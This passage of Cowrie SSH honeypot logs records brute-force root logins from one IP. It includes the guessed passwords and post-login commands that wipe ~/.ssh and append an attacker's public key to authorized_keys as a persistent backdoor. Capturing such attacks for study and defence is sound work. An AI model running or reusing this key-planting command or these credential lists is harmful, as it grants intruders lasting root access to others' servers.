es256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:00.684432Z","src_ip":"212.227.235.229","session":"45c423523c99"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:01.953659Z","src_ip":"212.227.235.229","session":"45c423523c99"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:03.262944Z","src_ip":"212.227.235.229","session":"45c423523c99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50082,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c85994c8f57","protocol":"ssh","message":"New connection: 212.227.235.229:50082 (1.2.3.4:22) [session: 6c85994c8f57]","sensor":"my-vps","timestamp":"2025-09-08T22:06:19.240457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:19.242719Z","src_ip":"212.227.235.229","session":"6c85994c8f57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:19.491124Z","src_ip":"212.227.235.229","session":"6c85994c8f57"}
{"eventid":"cowrie.login.failed","username":"matrix","password":"matrix","message":"login attempt [matrix/matrix] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:21.052959Z","src_ip":"212.227.235.229","session":"6c85994c8f57"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:22.309737Z","src_ip":"212.227.235.229","session":"6c85994c8f57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60464,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea516b567b8c","protocol":"ssh","message":"New connection: 212.227.235.229:60464 (1.2.3.4:22) [session: ea516b567b8c]","sensor":"my-vps","timestamp":"2025-09-08T22:06:25.048018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:25.048999Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:25.363319Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.login.success","username":"root","password":"0.0.0.0.","message":"login attempt [root/0.0.0.0.] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:06:26.659293Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:27.305810Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:27.306544Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:27.307886Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:27.622578Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:28.356748Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:06:28.357432Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:06:28.673115Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:28.674069Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34660,"dst_ip":"1.2.3.4","dst_port":22,"session":"1389d0fedf15","protocol":"ssh","message":"New connection: 212.227.235.229:34660 (1.2.3.4:22) [session: 1389d0fedf15]","sensor":"my-vps","timestamp":"2025-09-08T22:06:28.963663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:28.964655Z","src_ip":"212.227.235.229","session":"1389d0fedf15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37488,"dst_ip":"1.2.3.4","dst_port":22,"session":"a286698cfc48","protocol":"ssh","message":"New connection: 212.227.125.160:37488 (1.2.3.4:22) [session: a286698cfc48]","sensor":"my-vps","timestamp":"2025-09-08T22:06:29.246306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T22:06:29.247370Z","src_ip":"212.227.125.160","session":"a286698cfc48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:29.260185Z","src_ip":"212.227.235.229","session":"1389d0fedf15"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T22:06:29.306243Z","src_ip":"212.227.125.160","session":"a286698cfc48"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:29.624025Z","src_ip":"212.227.125.160","session":"a286698cfc48"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:30.482416Z","src_ip":"212.227.235.229","session":"1389d0fedf15"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:31.780276Z","src_ip":"212.227.235.229","session":"1389d0fedf15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34668,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c1a64ee40c","protocol":"ssh","message":"New connection: 212.227.235.229:34668 (1.2.3.4:22) [session: 41c1a64ee40c]","sensor":"my-vps","timestamp":"2025-09-08T22:06:32.109834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:32.110479Z","src_ip":"212.227.235.229","session":"41c1a64ee40c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:32.561801Z","src_ip":"212.227.235.229","session":"41c1a64ee40c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:06:33.856962Z","src_ip":"212.227.235.229","session":"41c1a64ee40c"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.157816Z","src_ip":"212.227.235.229","session":"ea516b567b8c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.172794Z","src_ip":"212.227.235.229","session":"41c1a64ee40c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9e88b4b210","protocol":"ssh","message":"New connection: 212.227.235.229:65105 (1.2.3.4:22) [session: 9e9e88b4b210]","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.860411Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32842,"dst_ip":"1.2.3.4","dst_port":22,"session":"780183616fc0","protocol":"ssh","message":"New connection: 212.227.235.229:32842 (1.2.3.4:22) [session: 780183616fc0]","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.958289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.959282Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:34.971224Z","src_ip":"212.227.235.229","session":"9e9e88b4b210"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:35.141046Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.login.success","username":"root","password":"online@2024","message":"login attempt [root/online@2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:06:35.908790Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:36.351719Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:36.352688Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:06:36.354085Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:36.538113Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:06:36.921315Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:06:36.922237Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:06:37.107086Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:37.107986Z","src_ip":"212.227.235.229","session":"780183616fc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32858,"dst_ip":"1.2.3.4","dst_port":22,"session":"09395e438c56","protocol":"ssh","message":"New connection: 212.227.235.229:32858 (1.2.3.4:22) [session: 09395e438c56]","sensor":"my-vps","timestamp":"2025-09-08T22:06:37.288839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:06:37.290059Z","src_ip":"212.227.235.229","session":"09395e438c56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:06:37.471796Z","src_ip":"212.227.235.229","session":"09395e438c56"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:06:38.241716Z","src_ip":"212.227.235.229","session":"09395e438c56"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:06:39.428139Z","src_ip":"212.227.235.229","session":"09395e438c56"}
